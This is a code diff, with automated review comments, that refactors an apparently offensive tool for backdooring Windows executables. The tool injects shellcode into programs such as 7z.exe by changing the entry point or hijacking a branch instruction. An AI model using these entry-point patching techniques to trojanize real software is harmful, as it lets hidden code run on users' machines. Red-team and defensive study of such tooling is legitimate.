diff --git a/app/views.py b/app/views.py
index 06f3637..b1281df 100644
--- a/app/views.py
+++ b/app/views.py
@@ -48,11 +48,7 @@ def inject():
     settings.exec_style = ExecStyle[exec_style]
     inject_style = request.form['inject_style']
-    inject_style = InjectStyle[inject_style]
-    if inject_style == InjectStyle.ENTRY:
-        settings.inject_mode = 1
-    elif inject_style == InjectStyle.HIJACK:
-        settings.inject_mode = 2
+    settings.inject_style = InjectStyle[inject_style]
     print(str(settings))
     start(settings)
diff --git a/derbackdoorer/derbackdoorer.py b/derbackdoorer/derbackdoorer.py
index 8eb32e6..2153663 100644
--- a/derbackdoorer/derbackdoorer.py
+++ b/derbackdoorer/derbackdoorer.py
@@ -13,21 +13,16 @@ import logging
 from helper import hexdump
 from derbackdoorer.mype import MyPe
+from model.defs import *
 logger = logging.getLogger("DerBackdoorer")
 class PeBackdoor:
-    class SupportedRunModes(IntEnum):
-        ModifyOEP = 1
-        BackdoorEP = 2
-        HijackExport = 4
-
-
-    def __init__(self, mype: MyPe, main_shc, inject_mode):
+    def __init__(self, mype: MyPe, main_shc: bytes, inject_mode: InjectStyle):
         self.mype: MyPe = mype
-        self.runMode = inject_mode
-        self.shellcodeData = main_shc
+        self.runMode: InjectStyle = inject_mode
+        self.shellcodeData: bytes = main_shc
         # Working
         self.shellcodeOffset: int = 0 # from start of the file 
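Review bot: The new line writes `settings.inject_style`, but the attribute declared in model/settings.py and read in phases/injector.py and supermega.py in this same commit is `settings.inject_mode`, so the value chosen in the form lands on a name nothing reads and the Settings default stays in effect. The line should be `settings.inject_mode = InjectStyle[inject_style]`. `InjectStyle[...]` also raises KeyError for any form value that is not a member name, so this request-supplied string deserves a guarded lookup that rejects unknown names with a clear response rather than an unhandled exception. inject() continues outside the hunk.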
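Review bot: `from model.defs import *` pulls every name in model.defs into this module and hides which ones PeBackdoor actually depends on; the hunk uses only `InjectStyle`, so `from model.defs import InjectStyle` is the clearer form and avoids shadowing module-level names. Removing SupportedRunModes presumably leaves the `IntEnum` import earlier in the file unused — worth checking, since that import is above the hunk.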
@@ -77,22 +72,22 @@ Trailing {sect_name} bytes:
     def setupShellcodeEntryPoint(self):
-        if self.runMode == int(PeBackdoor.SupportedRunModes.ModifyOEP):
+        if self.runMode == InjectStyle.ChangeEntryPoint:
             rva = self.mype.pe.get_rva_from_offset(self.shellcodeOffset)
             self.mype.set_entrypoint(rva)
             logger.info(f'Address Of Entry Point changed to: RVA 0x{rva:x}')
             return True
-        elif self.runMode == int(PeBackdoor.SupportedRunModes.BackdoorEP):
+        elif self.runMode == InjectStyle.BackdoorCallInstr:
             return self.backdoorEntryPoint()
-        elif self.runMode == int(PeBackdoor.SupportedRunModes.HijackExport):
-            addr = self.getExportEntryPoint()
-            if addr == -1:
-                logger.critical('Could not find any export entry point to hijack! Specify existing DLL Exported function with -e/--export!')
-
-            return self.backdoorEntryPoint(addr)
+        #elif self.runMode == int(PeBackdoor.SupportedRunModes.HijackExport):
+        # addr = self.getExportEntryPoint()
+        # if addr == -1:
+        # logger.critical('Could not find any export entry point to hijack! Specify existing DLL Exported function with -e/--export!')
+        #
+        # return self.backdoorEntryPoint(addr)
         return False
@@ -250,7 +245,7 @@ Trailing {sect_name} bytes:
             self.compiledTrampoline = encoding
             self.compiledTrampolineCount = count
-            logger.info('Successfully backdoored entry point with jump/call to shellcode.\n')
+            logger.info('Successfully backdoored entry point with jump/call to shellcode')
             return instr.address
         return 0
diff --git a/derbackdoorer/mype.py b/derbackdoorer/mype.py
index b5b756b..133ab13 100644
--- a/derbackdoorer/mype.py
+++ b/derbackdoorer/mype.py
@@ -56,13 +56,11 @@ class MyPe():
     def get_code_section_data(self) -> bytes:
         sect = self.get_code_section()
-        print("CODE GET: {}".format(len(sect.get_data())))
         return bytes(sect.get_data())
     def write_code_section_data(self, data: bytes):
         sect = self.get_code_section()
-        print("CODE SET {} {}".format(len(data), sect.PointerToRawData))
         self.pe.set_bytes_at_offset(sect.PointerToRawData, data)
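Review bot: The HijackExport branch is kept as a block of commented-out code rather than deleted; the enum now has only two members so the branch can never be selected, and version history already preserves it, so the six `#elif ... # return self.backdoorEntryPoint(addr)` lines should simply go. The trailing `return False` is also reached silently for any runMode the two comparisons do not match, which a caller only sees as a bare False; a `logger.error(f'Unsupported inject style: {self.runMode}')` before it makes a misconfiguration visible. setupShellcodeEntryPoint's body is within the hunk, but its callers are not.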
diff --git a/model/defs.py b/model/defs.py
index c1f7ffe..8ca31b2 100644
--- a/model/defs.py
+++ b/model/defs.py
@@ -27,9 +27,10 @@ class ExecStyle(Enum):
 class DataRefStyle(Enum):
     APPEND = 1
+
 class InjectStyle(Enum):
-    ENTRY = "change AddressOfEntryPoint"
-    HIJACK = "hijack branching instruction at Original Entry Point (jmp, call, ...)"
+    ChangeEntryPoint = "change AddressOfEntryPoint"
+    BackdoorCallInstr = "hijack branching instruction at Original Entry Point (jmp, call, ...)"
 class SourceStyle(Enum):
     peb_walk = "peb_walk"
diff --git a/model/settings.py b/model/settings.py
index 9ba8a6e..f4c72da 100644
--- a/model/settings.py
+++ b/model/settings.py
@@ -14,7 +14,7 @@ class Settings():
         self.short_call_patching: bool = False
         # Injectable
-        self.inject_mode: int = 2
+        self.inject_mode: InjectStyle = InjectStyle.BackdoorCallInstr
         self.inject_exe_in: FilePath = ""
         self.inject_exe_out: FilePath = ""
diff --git a/phases/injector.py b/phases/injector.py
index bc51a76..e225684 100644
--- a/phases/injector.py
+++ b/phases/injector.py
@@ -26,8 +26,8 @@ def inject_exe(
     shellcode_in = project.payload.payload_path
     exe_in = settings.inject_exe_in
     exe_out = settings.inject_exe_out
-    inject_mode = settings.inject_mode
-    source_style = settings.source_style
+    inject_mode: InjectStyle = settings.inject_mode
+    source_style: SourceStyle = settings.source_style
     logger.info("--[ Injecting: {} into: {} -> {} (mode: {})".format(
         shellcode_in, exe_in, exe_out, inject_mode 
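Review bot: The new default and annotation in model/settings.py reference `InjectStyle`, and the hunk shows no import for it; unless model/settings.py already imports it above the hunk, constructing Settings now raises NameError at the first call. The same applies to the `InjectStyle` and `SourceStyle` annotations added in the phases/injector.py hunk. If an import is needed, `from model.defs import InjectStyle` (and `SourceStyle`) is preferable to the wildcard form used in derbackdoorer.py. Settings.__init__ and inject_exe both continue outside their hunks.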
@@ -92,7 +92,7 @@ def injected_fix_iat(mype: MyPe, carrier: Carrier, exe_host: ExeHost):
         offset_from_code = code.index(iatRequest.placeholder)
         instruction_virtual_address = offset_from_code + exe_host.image_base + exe_host.code_virtaddr
         logger.info(" Replace {} at VA 0x{:x} with call to IAT at VA 0x{:x}".format(
-            iatRequest.placeholder, instruction_virtual_address, destination_virtual_address
+            iatRequest.placeholder.hex(), instruction_virtual_address, destination_virtual_address
         ))
         jmp = assemble_and_disassemble_jump(
             instruction_virtual_address, destination_virtual_address
@@ -124,7 +124,6 @@ def injected_fix_data(mype: MyPe, carrier: Carrier, exe_host: ExeHost):
     # patch code section
     # replace the placeholder with a LEA instruction to the data we written above
     code = mype.get_code_section_data()
-    print("Type of code: ", type(code))
     for datareuse_fixup in reusedata_fixups:
         if not datareuse_fixup.randbytes in code:
             raise Exception("DataResuse: ID {} not found, abort".format(
diff --git a/phases/masmshc.py b/phases/masmshc.py
index 8a7c957..42d2549 100644
--- a/phases/masmshc.py
+++ b/phases/masmshc.py
@@ -1,9 +1,12 @@
 import re
 import os
+import logging
+
+logger = logging.getLogger("masmshc")
-VERSION = "0.3"
 g_is32bit = False
+
 class Params:
     def __init__(self, infile, outfile, inline_strings, remove_crt, append_rsp_stub):
         self.infile = infile
@@ -116,10 +119,10 @@ def process_file(params):
                 # ofile.write("\tjmp\tmain\n")
             elif params.append_rsp_stub:
                 append_align_rsp(ofile)
-                print("[INFO] Entry Point: AlignRSP")
+                logger.debug("[INFO] Entry Point: AlignRSP")
             if seg_name == "_BSS":
-                print(f"[ERROR] Line {line_count + 1}: _BSS segment detected! Remove all global and static variables!\n")
+                logger.error(f"[ERROR] Line {line_count + 1}: _BSS segment detected! Remove all global and static variables!\n")
             if seg_name in ("pdata", "xdata", "voltbl"):
                 in_skipped = True
diff --git a/supermega.py b/supermega.py
index d9e4ae3..5a63fbe 100644
--- a/supermega.py
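Review bot: The converted calls in the process_file hunk keep the hand-written `[INFO]`/`[ERROR]` prefixes and the trailing `\n`, which the log level and the handler's formatter now supply, and the first one is emitted at DEBUG while its text claims INFO. Proposed: `logger.info("Entry Point: AlignRSP")` and `logger.error(f"Line {line_count + 1}: _BSS segment detected! Remove all global and static variables!")`. process_file starts and ends outside the hunk.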
+++ b/supermega.py
@@ -58,17 +58,17 @@ def main():
     if args.verify == "peb":
         settings.source_style = SourceStyle.peb_walk
-        settings.inject_mode = 2
+        settings.inject_mode = InjectStyle.BackdoorCallInstr
         settings.inject_exe_in = "exes/7z.exe"
         settings.inject_exe_out = "out/7z-verify.exe"
     elif args.verify == "iat":
         settings.source_style = SourceStyle.iat_reuse
-        settings.inject_mode = 2
+        settings.inject_mode = InjectStyle.BackdoorCallInstr
         settings.inject_exe_in = "exes/procexp64.exe"
         settings.inject_exe_out = "out/procexp64-verify.exe"
     elif args.verify == "rwx":
         settings.source_style = SourceStyle.peb_walk
-        settings.inject_mode = 1 # ,2 is broken atm
+        settings.inject_mode = InjectStyle.ChangeEntryPoint # ,2 is broken atm
         settings.inject_exe_in = "exes/wifiinfoview.exe"
         settings.inject_exe_out = "out/wifiinfoview.exe-verify.exe"
     else:
@@ -101,12 +101,14 @@ def main():
     if args.exec == "direct_1":
         settings.exec_style = ExecStyle.CALL
-    if args.rbrunmode:
-        if args.rbrunmode == "1" or args.rbrunmode == "2":
-            settings.inject_mode = int(args.rbrunmode)
+    if args.inject:
+        if args.rbrunmode == "eop":
+            settings.inject_mode = InjectStyle.ChangeEntryPoint
+        elif args.rbrunmode == "backdoor":
+            settings.inject_mode = InjectStyle.BackdoorCallInstr
         else:
             logging.error("Invalid mode, use one of:")
-            for i in ["eop", "backdoor"]:
+            for i in ["eop", "backdoor"]:
                 logging.error(" {} {}".format(i, rbrunmode_str(i)))
             return
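Review bot: The guard in the second hunk changed from `if args.rbrunmode:` to `if args.inject:`, so when `--inject` is given without a run mode, `args.rbrunmode` (presumably None unless argparse supplies a default, which is not visible here) matches neither branch and the command logs "Invalid mode" and returns instead of keeping the Settings default; if that default is intended, the error should only fire for a set but unrecognised value, e.g. `elif args.rbrunmode:` in place of the bare `else:`. `rbrunmode_str(i)` is now called with `"eop"` and `"backdoor"` but its definition is not in this diff; if it still keys on `"1"`/`"2"`, the help text printed here is wrong. The `# ,2 is broken atm` comment in the first hunk refers to the old integer mode and should name `InjectStyle.BackdoorCallInstr` instead. main() continues outside both hunks.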